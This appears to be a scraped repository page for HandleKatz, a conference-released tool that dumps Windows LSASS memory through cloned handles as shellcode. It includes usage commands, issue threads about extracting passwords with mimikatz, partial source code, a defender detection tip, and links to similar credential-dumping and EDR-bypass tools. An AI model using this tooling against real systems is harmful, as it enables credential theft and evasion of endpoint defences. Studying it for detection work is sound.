PIC lsass dumper using cloned handles

Overview

HandleKatz

This tool was implemented as part of our Brucon2021 conference talk and demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same.

It compiles down to an executable living fully in its text segment. Thus, the extracted .text segment of the PE file is fully position independent code (=PIC), meaning that it can be treated like any shellcode.

The execution of HandleKatz in memory has a very small footprint, as itself does not allocate any more executable memory and can therefore efficiently be combined with concepts such as (Phantom)DLL-Hollowing as described by @_ForrestOrr. This is in contrast to PIC PE loaders, such as Donut, SRDI or Reflective Loaders which, during PE loading, allocate more executable memory. Additionally, it makes use of a modified version of ReactOS MiniDumpWriteDumpA using direct system calls to write an obfuscated dump to disk.

For detailed information please refer to the PDF file PICYourMalware.pdf in this repository.

Usage

  • make all to build HandleKatzPIC.exe, HandleKatz.bin and loader.exe

Please note that different compiler (versions) yield different results. This might produce a PE file with relocations.

All tests were carried out using x86_64-w64-mingw32-gcc mingw-gcc version 11.2.0 (GCC). The produced PIC was successfully tested on: Windows 10 Pro 10.0.17763. On other versions of windows, API hashes might differ.

To use the PIC, cast a pointer to the shellcode in executable memory and call it according to the definition:

DWORD handleKatz(BOOL b_only_recon, char* ptr_output_path, uint32_t pid, char* ptr_buf_output);
  • b_only_recon If set, HandleKatz will only enumerate suitable handles without dumping
  • ptr_output_path Determines where the obfuscated dump will be written to
  • pid What PID to clone a handle from
  • ptr_buf_output A char pointer to which HandleKatz writes its internal output

For deobfuscation of the dump file, the script Decoder.py can be used.

Loader implements a sample loader for HandleKatz:

loader.exe --pid:7331 --outfile:C:\Temp\dump.obfuscated

Usage of HandleKatz PIC

Detection

As cloned handles are used along with modified ReactOS code, no ProcessAccess events can be observed on Lsass. However, ProcessAccess events on programs which hold a handle to Lsass can be observed.

Defenders can monitor for ProcessAccess masks with set PROCESS_DUP_HANDLE (0x0040) to identify the usage of this tool.

Credits

Issues
  • ERROR kuhl_m_sekurlsa_acquireLSA

    ERROR kuhl_m_sekurlsa_acquireLSA

    hi, just a feed back on a capture, no issue when using Decode.py but having error when using mimkatz to get login passwords

    mimikatz # sekurlsa::minidump toto Switch to MINIDUMP : 'toto'

    mimikatz # sekurlsa::logonPasswords Opening : 'toto' file for minidump... ERROR kuhl_m_sekurlsa_acquireLSA ; Key import

    mimikatz #

    Did another capture on another computer, no error but mimkatz does fc after a while without giving results

    for --pid: using lssas.exe pid for the capture.

    opened by nocomp 3
  • make error adjustack.o

    make error adjustack.o

    hi, just did a new pull for try to compile on windows getting this error now, seems a that adjustack.o is missing

    PS C:\Users\nocomp\Documents\tools\HandleKatz> make all nasm -f win64 src/adjuststack.asm -o adjuststack.o process_begin: CreateProcess(NULL, nasm -f win64 src/adjuststack.asm -o adjuststack.o, ...) failed. make (e=2): Le fichier spÚcifiÚ est introuvable. make: *** [makefile:34: adjuststack.o] Error 2 PS C:\Users\nocomp\Documents\tools\HandleKatz> ls

    Répertoire : C:\Users\nocomp\Documents\tools\HandleKatz
    

    Mode LastWriteTime Length Name


    d----- 22/10/2021 08:13 bin d----- 22/10/2021 08:13 imgs d----- 22/10/2021 08:13 loader d----- 22/10/2021 08:13 src -a---- 22/10/2021 08:13 953 Decoder.py -a---- 22/10/2021 08:13 131 extract.sh -a---- 22/10/2021 08:13 1398 makefile -a---- 22/10/2021 08:13 1551926 PICYourMalware.pdf -a---- 22/10/2021 08:13 3802 readme.md

    PS C:\Users\nocomp\Documents\tools\HandleKatz> ls .\src\

    Répertoire : C:\Users\nocomp\Documents\tools\HandleKatz\src
    

    Mode LastWriteTime Length Name


    -a---- 22/10/2021 08:13 344 adjuststack.asm -a---- 22/10/2021 08:13 7215 ApiResolve.c -a---- 22/10/2021 08:13 16215 APIResolve.h -a---- 22/10/2021 08:13 62 chkstk_ms.asm -a---- 22/10/2021 08:13 23845 DumpTools.c -a---- 22/10/2021 08:13 3720 DumpTools.h -a---- 22/10/2021 08:13 140 HandleKatz.h -a---- 22/10/2021 08:13 4805 HandleKatzPIC.c -a---- 22/10/2021 08:13 4863 HandleTools.c -a---- 22/10/2021 08:13 261 HandleTools.h -a---- 22/10/2021 08:13 102 linker.ld -a---- 22/10/2021 08:13 7917 Misc.c -a---- 22/10/2021 08:13 1612 Misc.h -a---- 22/10/2021 08:13 31567 syscalls.asm -a---- 22/10/2021 08:13 1721 syscalls.h

    PS C:\Users\nocomp\Documents\tools\HandleKatz>

    opened by nocomp 2
  • make error

    make error

    hi, just gave it a try and having an issue creating exe i guess, any tip?

    here are the logs, hope it ll help:

    nasm -f win64 src/adjuststack.asm -o adjuststack.o nasm -f win64 src/chkstk_ms.asm -o chkstk_ms.o nasm -f win64 src/syscalls.asm -o syscalls.o x86_64-w64-mingw32-gcc src/ApiResolve.c -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o ApiResolve.o -Wl,-Tlinker.ld,--no-seh -DC2 x86_64-w64-mingw32-gcc src/HandleKatzPIC.c -masm=intel -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o HandleKatzPIC.o -Wl,-Tlinker.ld,--no-seh -DC2 x86_64-w64-mingw32-gcc src/Misc.c -masm=intel -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o Misc.o -Wl,-Tlinker.ld,--no-seh -DC2 x86_64-w64-mingw32-gcc src/HandleTools.c -masm=intel -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o HandleTools.o -Wl,-Tlinker.ld,--no-seh -DC2 x86_64-w64-mingw32-gcc src/DumpTools.c -masm=intel -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o DumpTools.o -Wl,-Tlinker.ld,--no-seh -DC2 x86_64-w64-mingw32-ld -s adjuststack.o ApiResolve.o Misc.o HandleKatzPIC.o HandleTools.o DumpTools.o syscalls.o chkstk_ms.o -o bin/HandleKatzPIC.exe x86_64-w64-mingw32-ld : ne peut ouvrir le fichier de sortie bin/HandleKatzPIC.exe : Aucun fichier ou dossier de ce type make: *** [makefile:10 : make] Erreur 1

    br

    opened by nocomp 2
  • Handle leak in error cases in check_handles()

    Handle leak in error cases in check_handles()

    The for loop processes handles for the in_pid process. It creates a couple handles in the process (h_process, dupHandle). On any error encountered it continues the loop and overwrites those handle values, causing the handles to be leaked.

    HANDLE check_handles(PSYSTEM_HANDLE_INFORMATION handle_info, DWORD in_pid, char* ptr_output, struct fPtrs* ptr_functions) {
    
        ...
        HANDLE dupHandle = NULL, h_process = NULL, h_return = NULL;
        ...
    
        for (idx_handle = 0; idx_handle < handle_info->HandleCount; idx_handle++) {
    
            entry_info = &handle_info->Handles[idx_handle];
    
            if (in_pid && in_pid != entry_info->ProcessId)
                continue;
    
            // Checking some granted access. The internet says, NtDuplicateObject() might hang on these rights
            if (entry_info->GrantedAccess != 0x0012019f && entry_info->GrantedAccess != 0x001a019f && entry_info->GrantedAccess != 0x00120189 && entry_info->GrantedAccess != 0x00100000) {
    
                if (objectTypeInfo != NULL) {
                    ptr_functions->_VirtualFree(objectTypeInfo, 0, MEM_RELEASE);
                    objectTypeInfo = NULL;
                }
    
                uPid.UniqueProcess = entry_info->ProcessId;
                uPid.UniqueThread = 0;
    
    !            NtOpenProcess(&h_process, PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE, &ObjectAttributes, &uPid);   <<<< overwrites any previous h_process handle
    !            NtDuplicateObject(h_process, (HANDLE)(uint64_t)entry_info->Handle, NtCurrentProcess(), &dupHandle, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, 0, 0);   <<<<  overwrites previous dupHandle value
    
                objectTypeInfo = (POBJECT_TYPE_INFORMATION)ptr_functions->_VirtualAlloc(0, 0x1000, MEM_COMMIT, PAGE_READWRITE);
                if (objectTypeInfo == NULL)
                    continue;
    
                status = NtQueryObject(dupHandle, (OBJECT_INFORMATION_CLASS)ObjectTypeInformation, objectTypeInfo, 0x1000, NULL);
                if (!NT_SUCCESS(status)){
    !                continue;      <<< dupHandle, h_process leaked as they get overwritten on the next iteration
                }
    
                if (ptr_functions->_strcmpW(objectTypeInfo->TypeName.pBuffer, str_process))
    !                continue;      <<< dupHandle, h_process leaked as they get overwritten on the next iteration
    
                if (!ptr_functions->_GetModuleFileNameExA(dupHandle, NULL, handle_name, MAX_PATH))
    !                continue;      <<< dupHandle, h_process leaked as they get overwritten on the next iteration
    
                if (!ptr_functions->_GetProcessImageFileNameA(h_process, process_path, MAX_PATH))
    !                continue;      <<< dupHandle, h_process leaked as they get overwritten on the next iteration
    
                ....
            }
    
        }
    
        if (h_process != NULL)
            ptr_functions->_CloseHandle(h_process);
     
       if (objectTypeInfo != NULL)
            ptr_functions->_VirtualFree(objectTypeInfo, 0, MEM_RELEASE);
    
        return h_return;
    
    }
    

    See https://github.com/codewhitesec/HandleKatz/blob/5e18f107694aaeb591c10fa9ec392cf9a7c1bf2b/src/HandleTools.c#L75 and related

    opened by JohnLaTwC 1
  • makefile: Build everything (including loader demo) from source

    makefile: Build everything (including loader demo) from source

    I wanted to build everything from source before kicking it around in our detection lab. The changes should make the Makefile a bit more robust, too.

    Thanks for the great work. Really looking forward to seeing variants of this in the wild again soon. ;-)

    opened by hillu 1
  • Help With running on Windows Server 2008

    Help With running on Windows Server 2008

    Hello! I tried running it on windows 10, and it's working perfectly. so I decided to run it also on other OS. I took Windows Server 2008 R2 (6.1.7601) and tested it on it - I don't know why, but it's crashing :(. after a bit debugging the code I saw that it's crashing in the getDllBase. and the crash is because dll_name->pBuffer is 0x400.

    Why should it not work on Windows Server 2008? and how can I 'Patch' it so it will work? looks like all the dlls are existing...

    Thank you !

    opened by DavidSMoore11 4
Owner
CODE WHITE GmbH
CODE WHITE GmbH
A PIC/FLIP fluid simulation based on the methods found in Robert Bridson's "Fluid Simulation for Computer Graphics"

GridFluidSim3d This program is an implementation of a PIC/FLIP liquid fluid simulation written in C++11 based on methods described in Robert Bridson's

Ryan Guy 712 Jun 22, 2022
C++ POC to write addintional credentials into LSASS process

LSASS_Injection_CreateProcessWithLogonW C++ POC to write addintional credentials into LSASS process Usage: LSASS_Injection_CreateProcessWithLogonW USE

null 3 Feb 9, 2022
A Simple LSASS Credential Injection Tool

CredInject Hello Dear Reader! Welcome to the CredInject repo -- This project is based on HoneyCred and uses the same method to inject credentials into

null 7 Jun 8, 2022
A Beacon Object File that creates a minidump of the LSASS process.

NanoDump A Beacon Object File that creates a minidump of the LSASS process. Features It uses syscalls (with SysWhispers2) for most operations You can

HelpSystems 802 Jun 19, 2022
EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections and LSASS protections

EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections (Kernel callbacks and ETW TI provider) and LSASS protections. Multiple userland unhooking techniques are also implemented to evade userland monitoring.

Wavestone - Cybersecurity & Digital Trust 564 Jun 26, 2022
Internal dumper for Unity3d libil2cpp.so

Auto-Il2cppDumper This is for helping you get dump.cs from Il2cpp game hope this will help you >::< Important This project is modifying version of Rir

BryanGIG 28 Jun 19, 2022
Just a basic Offsets and Netvar dumper for Apex Legends

Not much to say just an Apex Legends Offsets + Netvar Dumper, it should survive some game updates and also it gave to you almost all you need to updat

dhanax26 43 Jun 1, 2022
A short and sweet hex dumper!

██████╗ ██████╗ ███╗ ███╗██████╗ ██╔═══██╗██╔══██╗████╗ ████║██╔══██╗ ██║ ██║██║ ██║██╔████╔██║██████╔╝ ██║▄▄ ██║██║ ██║██║╚██╔╝██║██╔═══

Victor Sarkisov 1 Nov 18, 2021
A dumper for CS:GO cheat loaders that use manual map injection method

NoobDumper v2 A (mostly dll) dumper for CS:GO cheat loaders that use manual map injection method How to use this Inject the dumper into the loader ( x

noobes 20 Jun 25, 2022
Simple native jvm class dumper written in C by hook ClassLoader

JVM Native Class Dumper Simple native jvm class dumper written in C by hook ClassLoader What is used for? This tool allows you to dump all java classe

null 15 Jun 15, 2022
Android Dumper Lib From The Memory

LibDumper This Project Is Using For Make You Easy Dump Lib From The Memory Changelog 3.5 : fixing corrupt file after fixing elf format result dump [st

BryanGIG 31 Jan 27, 2022
Simple, fully external, smart, fast, JSON-configurated, feature-rich Windows x86 DLL Memory Dumper with Code Generation. Written in Modern C++.

altdumper Simple, fully external, smart, fast, JSON-configurated, feature-rich Windows x86 DLL Memory Dumper with Code Generation. Written in Modern C

cristei 11 Apr 18, 2022
Spotify ogg dumper

Soggfy - SpotifyOggDumper Previous Spotify downloader projects (XSpotify, spotifykeydumper) worked by recovering encryption keys and re-downloading tr

Daniel 261 Jun 25, 2022
A test using a TTGO module (ESP32 + screen) which renders a 3d scene using pingo library

A simple 3D renderer tested and developed for the TTGO T-Display ESP32 board. The 3d renderer is: https://github.com/fededevi/pingo The 3D renderer is

fedevi 8 Apr 28, 2022
credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege

forkatz credential dump using forshaw technique using SeTrustedCredmanAccessPrivilege This code is based off of the blog post by james forshaw: https:

Barbarisch 116 Jun 25, 2022
Another version of EVA using anti-debugging techs && using Syscalls

EVA2 Another version of EVA using anti-debugging techs && using Syscalls First thing: Dont Upload to virus total. this note is for you and not for me.

null 252 Jun 23, 2022
In this Program, I am using C language and creating All Patterns Program using Switch case

In this Program, I am using C language and creating All Patterns Program using Switch case. It has 15 pattern programs like a pyramid, half pyramid, etc...

Rudra_deep 1 Nov 13, 2021
In DFS-BFS Implementation In One Program Using Switch Case I am Using an Simple And Efficient Code of DFS-BFS Implementation.

DFS-BFS Implementation-In-One-Program-Using-Switch-Case-in-C Keywords : Depth First Search(DFS), Breadth First Search(BFS) In Depth First Search(DFS),

Rudra_deep 1 Nov 17, 2021
multi-sdr-gps-sim generates a IQ data stream on-the-fly to simulate a GPS L1 baseband signal using a SDR platform like HackRF or ADLAM-Pluto.

multi-sdr-gps-sim generates a GPS L1 baseband signal IQ data stream, which is then transmitted by a software-defined radio (SDR) platform. Supported at the moment are HackRF, ADLAM-Pluto and binary IQ file output. The software interacts with the user through a curses based text user interface (TUI) in terminal.

null 57 Jun 20, 2022